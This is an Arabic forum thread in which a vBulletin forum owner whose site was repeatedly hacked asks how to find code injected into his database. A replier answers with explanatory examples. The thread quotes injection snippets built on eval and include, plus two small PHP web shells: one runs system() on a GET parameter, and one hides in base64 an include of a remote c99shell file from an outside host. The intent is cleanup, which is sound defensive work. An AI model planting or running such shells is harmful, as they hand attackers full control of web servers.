 |
قاعدة بيانات المنتدى تحتوي أكواد ارسال للهكـر
السـلام عليكم ورحمـة الله وبركاتـه
المنتـدى عندي اختـرق أكثـر من مرة والهكـر يقول
لو أسوي ايش ما اسـوي راح يخترقـه لأنه حاط اكواد ارسال
بقاعدة البيانات حتى لو غيرت الكونفج اسمه ومكانه وشفرته بالزند
راح يخترقـه وحتـى لو حطيتهـا على سيرفر ثاني على كلامـه ..
وحتى الغي الأكواد يقول لازم ارجع باك أب قبل 3 شهـور
وصعبـة اخسـر شغل 3 شهـور وأصـلاً ماعندي باك أب قبل 3 شهـور
وش الحـل ؟
كيف اشيل هالأكواد واتخلص منهـا حتى لا ترسل له المعلومات
على حسب ماقـال ..
الفكره في جزء اكيد في منتديات الفيبلتون
يمر على داله تنفيذ اكواد php
انا لا اعرف للفيبلتون
بس هي دي فكرتها
اخواننا هنا في المنتدى اليعرف اين يتم تنفيذ ال php بعد تسجيلها في قاعده بيانات يدلوك
__________________
يتم قبول الان استقبال اي طلبات التطبيقات
على اي نوع من المنصات الاتيه للجوال
( اندرويد -- ايفون ) تابعنا
( أعمالنا - اتصل بنا )
يمكنك الان عمل تطبيق خاص لمنتداك
تسـلم عـزيزي وبارك الله فيـك
وبإنتظـار أحد الإخـوة يفيـدني لأني ماراح
اقـدر ارجـع المنتـدى وكـل شوي الهكـر راح يطيـح قاعدة البيانات
ويـركب وحدة ثانيـة جديدة ، وعملت كل انواع الحمايـة
بس مافيـه فائـدة الرجـال يقـول لو ايش ماتسـوي
للكـونفج راح افكـه وأوصل للقـاعدة لأنهـا مصابـه بأكواد
الإرسـال المتصـلة !
الرجـال على كلامـه انه حاقن قاعـدة البيانات وبحثت بأكواد الحقن
اللي تستخـدم للإستثمـار والإستغـلال
وهم كود :
وكـود آخر يستخدم للحقـن والعـادة هالأكواد تحقـن بجـدول الأسئـلة الشائعـةكود PHP:".print include($HTTP_GET_VARS[cmd])."
أو جدول قليل استخدامـه بالملف أو ما أحد يستخدمـة مثل جدول الكلنـدر والأسئـلة
هـذه الأكواد اللي اعرفهـا تحقـن ومن خلالهـا يتمكود PHP:{${eval($_GET[vb])}}
الإتصـال بالقاعـدة عن طـريق ملف شـل ..
وبالمصـادفة اكتشف اربـع ملفات غـريبة على المسـار
vb/upload/1
كنت مـركب هاك المنـافع لرفع الصـور والملفات
بس حذفتـه بعـدين ..
المهم الملفات موجودة على الـرابط: رفعتهـا على تشـوفوهـا ممكن تفيد بمعـرفة وين الحقـن
1.rar - 0.07MB
..
وأشبـه ماتكون ملفات شـل لأنه صاد عنـدي الكاسبـر
سكـاي ملف med1a.php على إنه :
Backdoor.PHP.C99Shell.d
وهم ملف بعـد على المسـار
vb/upload/2/3.php
من نـوع
Backdoor.PHP.C99Shell.z
2.rar - 0.03MB
اتمنـى من الخبـراء مسـاعدتي بمعـرفة وين الحقـن
والحيـن القاعـدة عندي موجودة بس شايـل اتصالهـا
حاول ترفع الملف من موقع اخر
عموما التلغيم يعتمد على بعض الدوال المهمه منها
eval
system
include
انت وضعت امثله للحقن بواسطة الدوال eval و include
وهذا مثال للتوضيح باستخدام system
والبعض الاخر يقوم بتشفير الكود باستخدام اداة التشفير مثل Base64 او غيرها من برامج التشفيركود PHP:<?php
if(empty($_GET['shell'])){
} else {
$m=$_GET['shell'];
echo system($m) ;
}
?>
مثال
كود PHP:<?php
if(empty($_GET['shell'])){
} else {
$m=$_GET['shell'];
eval(base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL2M5OXNoZWxsLnR4dD8iKTs='));
}
?>ابحث في التمبلت عن الدوال وقم بحذفها + تغيير يوزر وباسورد القاعدهكود:include("http://rst.void.ru/download/c99shell.txt?");
ضوابط المشاركة
رد مع اقتباس